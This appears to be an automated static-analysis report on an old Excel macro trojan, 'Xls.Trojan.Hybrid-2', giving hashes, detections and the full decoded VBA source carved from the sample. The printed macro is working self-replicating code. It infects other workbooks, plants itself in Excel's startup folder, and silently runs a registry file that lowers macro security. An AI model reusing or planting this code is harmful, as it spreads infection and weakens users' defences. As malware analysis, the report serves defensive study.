Xls.Trojan.Hybrid-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 07a013ad345f67d9…

MALICIOUS

Office (OLE)

29.0 KB Created: 1999-06-14 17:51:46 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 86e8c907fef80fe11b4a7269e12ef448 SHA-1: eb9ea13b82d0a6a2e8610b4f2e73b05534cfb232 SHA-256: 07a013ad345f67d9998d91675ccb1b1e7758b492b690b8b92b3477aa9e9d2a52
202 Risk Score

Malware Insights

Xls.Trojan.Hybrid-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel macro-based trojan, identified as Xls.Trojan.Hybrid-2, attempts to achieve persistence by creating a registry file 'c:\hybrid.reg' and executing it with 'regedit /s c:\hybrid.reg'. The script also contains a hardcoded URL 'http://welcome.to/nomercy.com' and displays a message box to the user, likely as a distraction or to indicate infection.

Heuristics 4

  • ClamAV: Xls.Trojan.Hybrid-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Hybrid-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://welcome.to/nomercy.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2181 bytes
SHA-256: b39bc3c549fa782d2d831f59b3f73e68bb0a7cbeef4ace3b55f9a66548dd0439
Detection
ClamAV: Xls.Trojan.Hybrid-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EstaPasta_de_trabalho"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'get from TheNoMercyVIrusTeam
'http://welcome.to/nomercy.com
'
'EXcell 97 <> 2000 class infector HYBRID V1.0A
'
Sub Workbook_Deactivate()
'hybrid
On Error Resume Next
Set aw = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set tw = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If aw.Lines(2, 1) <> "'hybrid" Then
aw.deletelines 1, aw.countoflines
aw.insertlines 2, tw.Lines(2, tw.countoflines)
End If
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1."
Open "c:\hybrid.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft "
'Excel]"
Print #1, """Options6""=dword:00000000"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
Print #1, """Level""=dword:00000001"
Close 1
Shell "regedit /s c:\hybrid.reg", vbHide
End If
If (Day(Now)) = (Minute(Now)) Then
MsgBox "Repent!,Quit your Jobs!!,Slack off!!!", vbCritical, Title:="97 <-> 2000 "
'Hybrid v1.0a Bob is Watching"
End If
End Sub



Attribute VB_Name = "Plan1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Plan2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Plan3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True